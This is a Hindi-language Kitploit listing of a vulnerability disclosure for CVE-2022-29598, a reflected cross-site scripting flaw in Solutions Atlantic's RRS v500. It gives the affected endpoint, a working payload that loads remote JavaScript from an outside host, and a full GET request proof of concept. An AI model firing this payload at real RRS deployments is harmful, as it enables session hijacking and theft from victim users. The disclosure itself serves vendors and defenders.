Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-29598 — RRS v500 एप्लिकेशन एक परावर्तित क्रॉस-साइट स्क्रिप्टिंग (XSS) कमजोरी के प्रति संवेदनशील है। | Kitploit
उपकरण/GitHubGitHub/thegetch/cve-2022-29598
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनावेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubthegetch/cve-2022-29598

CVE-2022-29598

RRS v500 एप्लिकेशन एक परावर्तित क्रॉस-साइट स्क्रिप्टिंग (XSS) कमजोरी के प्रति संवेदनशील है।

रिपॉजिटरी देखें
4 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-29598 : RSS v500 में परावर्तित क्रॉस-साइट स्क्रिप्टिंग (XSS)

Mitre URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29598

NIST URL: https://nvd.nist.gov/vuln/detail/CVE-2022-29598

Solutions Atlantic का RRS v500 एप्लिकेशन एक परावर्तित क्रॉस-साइट स्क्रिप्टिंग (XSS) कमजोरी के लिए असुरक्षित है। XSS कमजोरी का शोषण करके एक हमलावर पीड़ित उपयोगकर्ता के रूप में प्रतिरूपण कर सकता है, संवेदनशील डेटा का खुलासा कर सकता है, या ऐसे कार्य कर सकता है जो पीड़ित उपयोगकर्ता को करने की अनुमति है।

fileName पैरामीटर उपयोगकर्ता इनपुट स्वीकार करता है और सर्वर के प्रतिक्रिया में इसे प्रतिबिंबित करता है। हालांकि प्रतिबिंब से पहले कुछ उपयोगकर्ता इनपुट फ़िल्टरिंग और सैनिटाइज़ेशन किया गया था, जैसे कुछ विशेष वर्ण एन्कोडिंग (अधिक/कम चिह्न), चूंकि प्रतिबिंब जावास्क्रिप्ट संदर्भ में हुआ, जावास्क्रिप्ट कोड को सर्वर के प्रतिक्रिया में इंजेक्ट किया जा सकता था, प्रतिबंधों को दरकिनार करते हुए।

प्रभावित URL:

  • /RRSWeb/maint/ShowDocument/ShowDocument.aspx

XSS पेलोड का उपयोग:

  • javascript:var%20x=document.createElement("script");x.src="https://thegetch.github.io/x";document.body.appendChild(x)';//

प्रूफ ऑफ कॉन्सेप्ट (POC):

दस्तावेज़ दिखाएँ कार्यक्षमता:

प्रभावित URL:

  • /RRSWeb/maint/ShowDocument/ShowDocument.aspx

एप्लिकेशन में बाहरी वेबसाइटों से लिंक करने की क्षमता है। बाहरी साइट के लिंक का चयन करते समय, /RRSWeb/maint/ShowDocument/ShowDocument.aspx पर दो पैरामीटर, fileName (जिसमें रीडायरेक्ट होने वाली बाहरी साइट का URL होगा) और requestType (जिसका मान ExternalLink होगा) के साथ एक अनुरोध किया जाता है। जब तक requestType पैरामीटर अपने डिफ़ॉल्ट मान पर सेट है, उपयोगकर्ता fileName पैरामीटर में जो कुछ भी डालता है, वह जावास्क्रिप्ट संदर्भ में, विशेष रूप से window.location.href के अंदर प्रतिबिंबित होगा। जावास्क्रिप्ट निर्देश के साथ XSS पेलोड का उपयोग करके, एक सफल परावर्तित XSS हमला हो सकता है।

XSS पेलोड के साथ GET अनुरोध:

root@kitploit:~
GET /RRSWeb/maint/ShowDocument/ShowDocument.aspx?requestType=ExternalLink&fileName=javascript:var%20x=document.createElement("script");x.src="https://thegetch.github.io/x";document.body.appendChild(x)';// HTTP/1.1
Host: <REDACTED>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://<REDACTED>/RRSweb/default.aspx
Cookie: ASP.NET_SessionId=<REDACTED>
Upgrade-Insecure-Requests: 1
Content-Length: 0


सर्वर प्रतिक्रिया:

01_RRS_XSS_Response_JS_Directive

ब्राउज़र में प्रस्तुत:

02_RRS_XSS_Rendered

खोज

अप्रैल 2022

  • Eric Getchell - TheGetch
टूल डाउनलोड करें